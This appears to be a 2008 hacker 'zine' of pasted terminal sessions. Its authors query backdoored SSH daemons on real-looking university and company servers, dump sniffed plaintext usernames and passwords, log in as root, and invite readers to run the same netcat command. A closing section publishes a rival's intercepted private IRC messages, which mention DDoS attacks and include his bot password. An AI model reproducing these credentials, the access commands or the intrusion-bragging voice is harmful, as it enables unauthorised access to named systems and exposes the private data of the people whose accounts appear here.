> Trying 207.145.66.12...
> Connected to 207.145.66.12.
> Escape character is '^]'.
>
> SSH-2.0-OpenSSH_4.7
> netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> smack
> pass_from: 24.218.192.76 user: root pass: cl1pt3xt (c-24-218-192-76.hsd1.ma.comcast.net)-> sorry bro
>
> pass_from: 75.68.31.152 user: gman pass: 0xc0ffee (c-75-68-31-152.hsd1.nh.comcast.net) -> >:(
>
> central@labsec [~xoxox/h3h3] # ssh root@207.145.66.12
> root@207.145.66.12's password:
>
> Last login: Wed Aug 6 23:25:38 2008 from 189.4.184.201 --------->>>>>>>>>>>>>>>>>>>>>>>>> quick question, who's that ?
>
> --------->>>>>>>>>>>>>>>>>>>>>>>>> doesn't that make you sad? i mean, wtf...
>
> d4:~#
> d4:~# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux d4 2.6.25-2-686 #1 SMP Tue May 27 15:38:35 UTC 2008 i686 GNU/Linux
> 03:36:51 up 68 days, 4:58, 0 user, load average: 1.88, 1.80, 1.74
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
>
> inet addr:207.145.66.12 Bcast:207.145.66.255 Mask:255.255.255.0
> inet6 addr: fe80::209:6bff:fe8c:e58/64 Scope:Link
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 212.111.196.163 22
>
> Trying 212.111.196.163...
> Connected to 212.111.196.163.
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.7
> netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> i DEMAND THE PASSWORD !
>
> SSH2_OUT: 127.0.0.1 user: root pass: x4rtuhg6 (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, i missed you, localhost.
>
> pass_from: ::ffff:10.66.10.111 user: root pass: dihlordifenil --------->>>>>>>>>>>>>>>>>>>>>>>>> h3h3 >;(
>
> central@labsec [~xoxox/h3h3] # ssh root@212.111.196.163
> root@212.111.196.163's password:
>
> Last login: Fri Aug 8 19:49:52 2008 from 189.4.161.222 ------------>>>>>>>>>>>>>> lets laugh for a while now
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
>
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux users 2.6.23-gentoo i686 ****
>
> root@users:~#
> root@users:~# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux users 2.6.23-gentoo #4 SMP PREEMPT Fri Dec 14 19:43:35 EET 2007 i686 Intel(R) Xeon(TM) CPU 3.00GHz GenuineIntel GNU/Linux
> 10:49:08 up 171 days, 22:37, 1 user, load average: 0.20, 0.24, 0.21
>
> USER TTY LOGIN@ IDLE JCPU PCPU WHAT
> root pts/0 10:46 0.00s 0.44s 0.00s w
> inet addr:192.168.253.3 Bcast:192.168.253.255 Mask:255.255.255.0
>
> inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
> inet addr:169.254.78.132 Bcast:169.254.255.255 Mask:255.255.0.0
>
> inet addr:127.0.0.1 Mask:255.0.0.0
> inet6 addr: ::1/128 Scope:Host
> inet addr:212.111.196.163 Bcast:212.111.196.191 Mask:255.255.255.224
>
> inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
> inet addr:212.26.143.6 Bcast:212.26.143.7 Mask:255.255.255.252
>
> inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 212.143.216.226 22
> Trying 212.143.216.226...
> Connected to 212.143.216.226.
> Escape character is '^]'.
>
> SSH-2.0-OpenSSH_4.3
> netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> im getting tired of this.
>
> pam_from: 62.219.238.196 user: root pass: QWERFcxz (mail2.tikalnetworks.com) ----->>>>>>>> no kidding.
>
> central@labsec [~xoxox/h3h3] # ssh root@212.143.216.226
> root@212.143.216.226's password:
>
> jessica temp # uname -a;w;/sbin/ifconfig -a|grep inet
>
> Linux jessica 2.6.17-gentoo-r7 #3 Sun Sep 3 11:17:41 IDT 2006 i686 Intel(R) Celeron(R) CPU 2.66GHz GenuineIntel GNU/Linux
> 09:58:11 up 3 days, 18:03, 1 user, load average: 1.29, 1.16, 1.08
> USER TTY LOGIN@ IDLE JCPU PCPU WHAT
>
> root pts/0 09:34 16:19 0.32s 0.30s ssh 10.0.0.3
> inet addr:10.0.0.253 Bcast:10.0.0.255 Mask:255.255.255.0
>
> inet addr:127.0.0.1 Mask:255.0.0.0
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103 22|grep OUT
> SSH2_OUT: 143.107.133.38 user: wlscopel pass: va1513zb (feynman.if.usp.br)
>
> SSH2_OUT: 143.107.133.233 user: pdborges pass: mipa0529 (aegir.if.usp.br)
> SSH2_OUT: 143.106.42.243 user: luana pass: 103174b (athenas.cna.unicamp.br)
>
> SSH2_OUT: 143.107.133.8 user: kpp pass: fth6mdy (landauer.if.usp.br)
> SSH2_OUT: 143.107.133.47 user: luana pass: 103174b (schroedinger.if.usp.br)
>
> SSH2_OUT: 143.107.133.76 user: mvarella pass: CH3Ftri (planck.if.usp.br)
> SSH2_OUT: 143.107.133.38 user: wlscopel pass: va1513zb (feynman.if.usp.br)
>
> SSH2_OUT: 143.107.133.47 user: cedric pass: KunD1cka (schroedinger.if.usp.br)
>
> central@labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103 22|grep from|grep -v bullshit
>
> pass_from: 143.107.133.244 user: hmf18 pass: xpx9b15+ (turista.if.usp.br)
> pass_from: 201.52.218.156 user: cedric pass: P1chona04 (c934da9c.virtua.com.br)
>
> pass_from: 201.82.105.213 user: mfsoares pass: 3p1t@xy (c95269d5.virtua.com.br)
> pass_from: 189.34.88.209 user: kpp pass: mdc6gpt (bd2258d1.virtua.com.br)
>
> pass_from: 189.102.19.167 user: pontes pass: r@s&09* (bd6613a7.virtua.com.br)
> pass_from: 189.102.98.126 user: lassali pass: las2008ro (bd66627e.virtua.com.br)
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@143.107.133.103 'uname -a'
> root@143.107.133.103's password:
>
> Linux romeo 2.6.5-7.286-smp #1 SMP Thu May 31 10:12:58 UTC 2007 x86_64 x86_64 x86_64 GNU/Linux
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 200.144.186.37 22
>
> Trying 200.144.186.37...
> Connected to shark.lcca.usp.br (200.144.186.37).
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.3
> netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> k from now on, no more netdump messages
>
> SSH2_OUT: 127.0.0.1 user: root pass: UspNNNNd (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> just got tired, u knoW
>
> SSH2_OUT: 127.0.0.1 user: amazonas pass: UspNNNNd (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> anyway im almost stopping pasting stuff
>
> -> alot of kool shit regarding usp.br here
> try yourself-> echo netdump|nc 200.144.186.37 22|grep usp.br
> or just grep OUT
>
> kthxnpurwelcome
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74 22|grep localhost
>
> SSH2_OUT: 127.0.0.1 user: root pass: ArmY1*00 (localhost) ->>>>>>>>>>>>>>>>> im glad you are here :) kind of makes it easy
>
> central@labsec [~xoxox/h3h3] # ssh root@200.145.203.74
> root@200.145.203.74's password:
>
> Last login: Thu Jul 31 09:30:33 2008 from nemo.df.ibilce.unesp.br
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
>
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux hobbes 2.6.18-6-686 i686 ****
>
> root@hobbes:~#
> root@hobbes:~# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux hobbes 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux
> 05:47:44 up 27 days, 15:12, 1 user, load average: 0.21, 0.15, 0.06
>
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> rico :0 - 06Aug08 ?xdm? 5:39 0.71s x-session-manager
> inet addr:200.145.203.74 Bcast:200.145.203.255 Mask:255.255.255.0
>
> inet6 addr: fe80::2e0:7dff:fed7:f778/64 Scope:Link
> inet addr:127.0.0.1 Mask:255.0.0.0
> inet6 addr: ::1/128 Scope:Host
> root@hobbes:~#
>
> central@labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74 22|grep unesp
> pass_from: 200.145.203.42 user: rico pass: so31fia12 (nemo.df.ibilce.unesp.br)
>
> SSH2_OUT: 200.145.203.42 user: ronaldo pass: LANmu80 (nemo.df.ibilce.unesp.br)
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 67.15.56.12 22
> Trying 67.15.56.12...
> Connected to 67.15.56.12.
> Escape character is '^]'.
> SSH-1.99-OpenSSH_3.9
>
> netdump
> SSH2_OUT: 127.0.0.1 user: root pass: l3nny1nt3l (localhost)
> SSH2_OUT: 127.0.0.1 user: lenny pass: l3nny1nt3l (localhost)
>
> pass_from: 76.188.180.141 user: joe pass: 1207j0s3ph7ys0n9813 (cpe-76-188-180-141.neo.res.rr.com)
> pass_from: 76.188.180.141 user: devel pass: ha1W0;rlD.0121 (cpe-76-188-180-141.neo.res.rr.com)
>
> pass_from: 76.188.180.141 user: celtrust pass: 1207j0s3ph9813 (cpe-76-188-180-141.neo.res.rr.com)
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@67.15.56.12
> root@67.15.56.12's password:
>
> Last login: Tue Aug 12 00:51:58 2008 from c-98-234-65-222.hsd1.ca.comcast.net
>
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
>
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux f1.celtrust.com 2.6.9-34.ELsmp i686 ****
>
> [root[@f1 ~]#
> [root[@f1 ~]# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux f1.celtrust.com 2.6.9-34.ELsmp #1 SMP Fri Feb 24 16:54:53 EST 2006 i686 i686 i386 GNU/Linux
> 05:20:15 up 153 days, 9:30, 0 users, load average: 2.62, 1.27, 0.63
>
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> inet addr:67.15.56.12 Bcast:67.15.57.255 Mask:255.255.254.0
>
> inet6 addr: fe80::211:11ff:fe67:a66b/64 Scope:Link
> inet addr:67.15.57.240 Bcast:67.15.57.255 Mask:255.255.255.0
>
> inet addr:67.15.57.241 Bcast:67.15.57.255 Mask:255.255.255.0
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # ssh root@66.119.174.19
> root@66.119.174.19's password:
>
>
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
> ### #### ## ##### ## ##
>
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux res1.van.metrobridge.net 2.6.18-5-686 i686 ****
>
> root@res1:~#
> root@res1:~# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux res1.van.metrobridge.net 2.6.18-5-686 #1 SMP Fri Jun 1 00:47:00 UTC 2007 i686 GNU/Linux
> 12:54:34 up 315 days, 17:40, 4 users, load average: 0.58, 0.35, 0.27
>
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> sky pts/0 66.119.176.2 11:41 1:12 0.00s 0.00s -bash
> sky pts/3 66.119.176.2 Tue15 20:53 0.18s 0.00s sshd: sky [priv]
>
> sky pts/6 66.119.176.2 11:42 1:10 0.16s 0.01s sshd: sky [priv]
> vee pts/7 74.221.143.3 12:23 28:41m 0.07s 0.00s telnet seton-3550
>
> inet addr:66.119.174.4 Bcast:66.119.174.15 Mask:255.255.255.240
> inet6 addr: fe80::219:b9ff:fee1:c808/64 Scope:Link
>
> inet addr:66.119.174.29 Bcast:66.119.174.31 Mask:255.255.255.240
> inet addr:65.39.152.235 Bcast:65.39.152.255 Mask:255.255.255.224
>
> inet addr:65.39.152.237 Bcast:65.39.152.255 Mask:255.255.255.224
> inet addr:66.119.174.19 Bcast:66.119.174.31 Mask:255.255.255.240
>
> inet addr:65.39.152.239 Bcast:65.39.152.255 Mask:255.255.255.224
> inet addr:66.119.174.3 Bcast:66.119.174.15 Mask:255.255.255.240
>
> inet addr:66.119.174.2 Bcast:66.119.174.15 Mask:255.255.255.240
>
> pass_from: 66.119.176.2 user: simon pass: pass77 (mail.metrobridge.com) [whole metrobridge with the same pass]
>
> pass_from: 66.119.176.2 user: sky pass: rotoFro7 (mail.metrobridge.com) [whole metrobridge with the same pass]
>
> have fun
>
> - what a shame.. again, metrobridge ? i told you to keep on eye on your sshd since your zine :(
>
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # ssh root@200.239.200.102
> root@200.239.200.102's password:
>
> Last login: Mon Aug 11 09:09:40 2008 from stml030.microlink.com.br
>
> Linux 2.6.11.12-ul1.
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
>
> #### ### #### ### # #### ##
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
>
> **** Linux proxy2-rj 2.6.11.12-ul1 i686 ****
>
> root@proxy2-rj:~#
> root@proxy2-rj:~# uname -a;hostname -f;w
> Linux proxy2-rj 2.6.11.12-ul1 #1 Tue Aug 30 12:40:56 BRT 2005 i686 unknown
> proxy2-rj.pop-rio.com.br
>
> 17:14:22 up 97 days, 5:09, 0 users, load average: 2.16, 1.88, 1.76
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> root@proxy2-rj:~#
> root@proxy2-rj:~# ./sshread mac.h|grep 200\.239|sort|uniq
>
> pass_from: 200.239.245.50 user: root pass: Beth01@ (gwpr03.microlink.com.br)
> pass_from: 200.239.245.70 user: root pass: pa$$w0rd (Froes.microlink.com.br)
>
> root@proxy2-rj:~# ./sshread mac.h|grep OUT
> SSH2_OUT: 127.0.0.1 user: root pass: BuCaaAadd (localhost) -----> /me laughs
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # ssh root@143.107.250.214
> root@143.107.250.214's password:
>
> Last login: Fri Jun 13 14:58:50 2008 from 143-107-55-100.iq.usp.br
>
> ..... !! HELLO WORLD !! .....
>
> @@@@@@ @@@@@@
> @@ @@ @@ @@
>
> @@ @@ @@ @@@ @@ @@ @@ @@@ @@ @@
> @@ @@ @@ @ @@ @@ @@ @@ @ @@ @@ @@
> IIII II I II IIII II I II IIII
> IIII III II IIII III II IIII
>
> II II II II II II II II II II
> II II IIIIII II II IIIIII II II
> **** Linux noelrosa.iq.usp.br 2.6.9-42.0.10.EL x86_64 **** ->>>> new kool motd, n1cE rIpZ
>
> [root[@noelrosa ~]#
>
> <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< s0RrY bUT We g0T tiReD oF pAstIng StUfF lIkE thAT >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>
> -;;;;;;; i think thats enough to paste, right ?
> -;;;;;; anyway, in the end/bottom of this 'zine' there is a file to download with some of the ip's that weve got from them
>
> -/-/-/-/-/-/-/-/-/-/ lEtz havE fuN WiTH r47's BnC rigHT noW -/-/-/-/-/-/-/-/-/-/
>
> r47 is r47@bl4ckh47.org * i own u! [and We own you!]
> r47 on @#combat #osiris @#/<-rad
> r47 using irc.ipv6.he.net Hurricane Electric IPV6 IRC Server
>
> r47 actually using host 2001:470:1f15:42b::3
> r47 End of /WHOIS list.
>
> central@labsec [~xoxox/h3h3] # ssh root@bl4ckh47.org -p 2222 bash
>
> root@bl4ckh47.org's password: .niklincith08. (same pass goes for all casablanca.cz/eurosignal.cz)
>
> uname -a;w;hostname -f
> Linux VoIP-Mnisek 2.6.18-3-k7-pj #2 Tue Feb 27 18:30:13 CET 2007 i686 GNU/Linux
> 10:13:26 up 162 days, 8:25, 0 users, load average: 0.04, 0.05, 0.01
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> VoIP.eurosignal.cz
>
> sit0 Link encap:IPv6-in-IPv4
> inet6 addr: ::10.0.2.254/96 Scope:Compat
> inet6 addr: ::127.0.0.1/96 Scope:Unknown
>
> inet6 addr: ::10.0.2.4/96 Scope:Compat
> inet6 addr: ::77.78.84.242/96 Scope:Compat
> UP RUNNING NOARP MTU:1480 Metric:1
>
> RX packets:0 errors:0 dropped:0 overruns:0 frame:0
> TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
> collisions:0 txqueuelen:0
> RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
>
> sit1 Link encap:IPv6-in-IPv4
> inet6 addr: 2001:470:1f15:42b::2/64 Scope:Global
> inet6 addr: 2001:470:1f15:42b::3/64 Scope:Global
> inet6 addr: 2001:470:1f15:42b::4/64 Scope:Global
>
> inet6 addr: 2001:470:1f15:42b::5/64 Scope:Global
> inet6 addr: 2001:470:1f15:42b::6/64 Scope:Global
> inet6 addr: 2001:470:1f15:42b::7/64 Scope:Global
> inet6 addr: fe80::a00:2fe/64 Scope:Link
>
> inet6 addr: fe80::a00:204/64 Scope:Link
> inet6 addr: fe80::4d4e:54f2/64 Scope:Link
> UP POINTOPOINT RUNNING NOARP MTU:1480 Metric:1
> RX packets:16700 errors:0 dropped:0 overruns:0 frame:0
>
> TX packets:9917 errors:0 dropped:0 overruns:0 carrier:0
> collisions:0 txqueuelen:0
> RX bytes:1677861 (1.6 MiB) TX bytes:982003 (958.9 KiB)
>
> tcp 0 0 77.48.84.242:65535 189.4.189.139:61593 ESTABLISHED
>
> tcp6 0 0 2001:470:1f15:42b:51338 2001:41e0:5::6667:6667 ESTABLISHED
> tcp6 0 0 2001:470:1f15:42b:49197 2001:470:0:6667::2:6667 ESTABLISHED
> tcp6 0 0 2001:470:1f15:42b:48159 2001:40a8:3000:1:0:6667 ESTABLISHED
>
> tcp6 0 0 2001:470:1f15:42b:51411 2001:40a8:3000:1:0:6667 ESTABLISHED
>
> perl 12655 root 4u IPv4 3027913 TCP *:65535 (LISTEN)
> root 12655 0.0 0.3 5256 3220 ? S Mar19 2:39 supervise log
>
> - nice process name btw
> - lets start the sniffer, shall we? - btw im using the ircsniff.pl you stole from efnet's box, thanks -
>
> <- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :u know d0n
>
> <- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :he took my nick
> <- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :he's packeting me
>
> <- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :;\
> -> PRIVMSG d0n_ :d0n No such nick/channel
> -> PRIVMSG d0n_ :d0n End of /WHOIS list.
> -> PRIVMSG d0n_ :change
>
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :lamer :(
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :owns my dsl
>
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :real leet
> -> PRIVMSG d0n :who ?
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :that d0n guy
>
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :had my nick
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :was talking shit
>
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :"here comes the ddos" he said
> -> PRIVMSG d0n :fuck
> -> PRIVMSG d0n :lets hack him
> -> PRIVMSG d0n :not hard target
>
> -> PRIVMSG d0n :hehehe
> -> PRIVMSG d0n :to me
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :HHEHEHEEH\
> -> PRIVMSG d0n ::>:>:>:>
> -> PRIVMSG d0n :sup bitchx
>
> -> PRIVMSG d0n ::>
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 ::)
> -> PRIVMSG d0n :bitchx bugged
> -> PRIVMSG d0n :do u use it ?
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :the client?
>
> -> PRIVMSG d0n :yah
> -> PRIVMSG d0n :0dayz
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :no shit..
> -> PRIVMSG d0n :eheh
>
> *********************** run to the hillz he h4s b1tchx 0d4y **********************
>
> -> PRIVMSG d0n :i have windows on linux (vmware) ->>>>>>>>>>>>>>>>>>>>> lies
> -> PRIVMSG d0n :hjmm
> -> PRIVMSG d0n :;>
>
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :ah yeah
> -> PRIVMSG d0n :omfg
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :any more fun with efnet soon?
>
> -> PRIVMSG d0n :im still drunked
> -> PRIVMSG d0n :no more
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :HEHE
> -> PRIVMSG d0n :im stoped with x0x0x
> <- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :;p
>
> -> PRIVMSG d0n :just sniffing idiots now ->>>>>>>>>>>>>>>>>>>> so we are
>
> *********************** /laugh time ********************************************
>
> -> PRIVMSG accuser :nem
> -> PRIVMSG accuser :nao me comunico mais com povo br ->>>>>>>>>>>>>>>>>>>>
> -> PRIVMSG accuser :nao eh meu nivel
>
> -> PRIVMSG accuser :so alguns amigos
> -> PRIVMSG accuser :nego roubo meu canal ontem ->>>>>>>>>>>>>>>>>>>> some guyz stole my network baby
>
> -> PRIVMSG accuser :recuperei
> -> PRIVMSG accuser :e tomei o nick deles ->>>>>>>>>>>>>>>>>>>> i ddosed them and got their nicks
>
> -> PRIVMSG accuser :/w psys
> -> PRIVMSG accuser :/w dtr
> -> PRIVMSG accuser :hehehe ->>>>>>>>>>>>>>>>>>>> now i feel gr8
>
> <- :accuser!~psy@64.244.62.214 PRIVMSG r47 :eu vi
> <- :accuser!~psy@64.244.62.214 PRIVMSG r47 :o psys tacando monte de bot
> -> PRIVMSG accuser :comigo eh dificil um br poder ->>>>>>>>>>>>>>>>>>>> HAHAHAHAHAHAHAHAAHHAHAHAHAHAHAHAHA (12x)
>
> -> PRIVMSG accuser :hehehe
> -> PRIVMSG accuser :eu mando! ->>>>>>>>>>>>>>>>>>>> im THE guy!
> -> PRIVMSG accuser :eu to mo fora de guerra cara
>
> -> PRIVMSG accuser :mas parece q os caras me perseguem
> -> PRIVMSG accuser :e sismam q sou lamer ->>>>>>>>>>>>>>>>>>>> /me laughs
>
> -> PRIVMSG accuser :rs
>
> -> PRIVMSG sexybaby :itsme q_+T*/81_3|Z3g; r47 ->>>>>>>>>>>>>>>>>>>> hiz botz, thanks for sharing
>
> -> PRIVMSG sexybaby :op q_+T*/81_3|Z3g;
> sexybaby on @#brasil @+#Sonya @#24/7 @+#prank @#unforgiven @#serious @#xanax ->>>>>>>>>>>>>>>>>>>> 3h3h3h3
>
>
> <- :KoaL4!h@216.75.56.186 PRIVMSG r47 :c vai me ajeita un trem que presta entum? ->>>>>>>>>>>>>>>>> gimm3 a b0x
> -> PRIVMSG KoaL4 :cara
>
> -> PRIVMSG KoaL4 :vou
> -> PRIVMSG KoaL4 :mas nao me atrapalha
> -> PRIVMSG KoaL4 :to aki programando
> -> PRIVMSG KoaL4 :pra um cliente chato pra kct
>
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :ta
>
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :arrumando truta
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :com os cara da defland pq
>
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :?
> -> PRIVMSG \g4br13l\ :falaram meu nome em vao
> -> PRIVMSG \g4br13l\ :nao qro isso
> -> PRIVMSG \g4br13l\ :so isso
>
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :r47
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :tu se esquenta
>
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :com bobagem
> -> PRIVMSG \g4br13l\ :hehee
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :?
>
> -> PRIVMSG \g4br13l\ :nao qro pivete
> -> PRIVMSG \g4br13l\ :de merda
> -> PRIVMSG \g4br13l\ :kiddie
> -> PRIVMSG \g4br13l\ :falando de mim
> -> PRIVMSG \g4br13l\ :pq qm manda ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA
>
> -> PRIVMSG \g4br13l\ :sou eu ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA
> -> PRIVMSG \g4br13l\ ::>
> -> PRIVMSG \g4br13l\ :esse univie.ac.at eh show
>
> -> PRIVMSG \g4br13l\ :tenho a www la
> -> PRIVMSG \g4br13l\ ::>
> -> PRIVMSG \g4br13l\ :usam checkpoint firewall one ----->>>>>>>>>>>>> what the fuck ?
>
> -> PRIVMSG \g4br13l\ :tunnelling by trace ----->>>>>>>>>>>>> ?!?1
> -> PRIVMSG \g4br13l\ :mto dificil pacota-la
>
>
> *********************** boyfriends are fighting - portuguese only, sorry **********************
>
> -> PRIVMSG #thc :skotch is gay
> -> PRIVMSG skotch :eai vagabunda
> -> PRIVMSG skotch :vai fica na putaria ateh qdo
> -> PRIVMSG skotch :to cheio de novidades
> -> PRIVMSG skotch :e para de me chamar de verme
>
> -> PRIVMSG skotch :rs
> <- ::skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vai toma no meu do teu cuh rapa, n qro papo contigo e ve se para de fica mandando alerta no meu nextel -> gtfo
>
> -> PRIVMSG skotch :ahahaha
> -> PRIVMSG skotch :vc tem certeza ->>>>>>>>> are you sure baby ?
> -> PRIVMSG skotch :entao eh isso ?
> -> PRIVMSG skotch :ja era ?:
>
> -> PRIVMSG skotch :ja era ?
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :sim
> -> PRIVMSG skotch :eu nao vou voltar aki denovo
> -> PRIVMSG skotch :pra falar com vc
>
> -> PRIVMSG skotch :ja era ?
> -> PRIVMSG skotch :CERTEZA? ->>>>>>>> are you sure we are breaking apart?????
